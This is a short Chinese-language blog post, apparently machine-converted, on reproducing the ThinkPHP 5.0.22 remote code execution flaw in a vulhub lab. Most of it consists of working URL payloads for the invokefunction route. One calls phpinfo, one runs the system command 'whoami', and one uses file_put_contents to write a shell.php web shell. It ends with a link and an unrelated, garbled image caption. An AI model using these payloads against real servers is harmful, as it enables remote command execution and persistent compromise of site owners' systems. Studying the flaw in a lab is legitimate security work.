複現環境
thinkphp5.0.22
推薦使用vulhub快速搭建漏洞環境
漏洞payload:
1:/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
2:index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
效果如下
寫入檔案的payload:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要寫入的檔案内容url編碼
更詳細可參考博文:
https://blog.csdn.net/qq_29647709/article/details/84956221
![ThinkPHP 3.2.3 簡單背景子產品開發(一)常用配置ThinkPHP 3.2.3 簡單背景子產品開發(一)常用配置 一、項目分組二、應用配置和子產品配置三、管理者登陸四、自定義 Session 存儲 五、文章管理[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)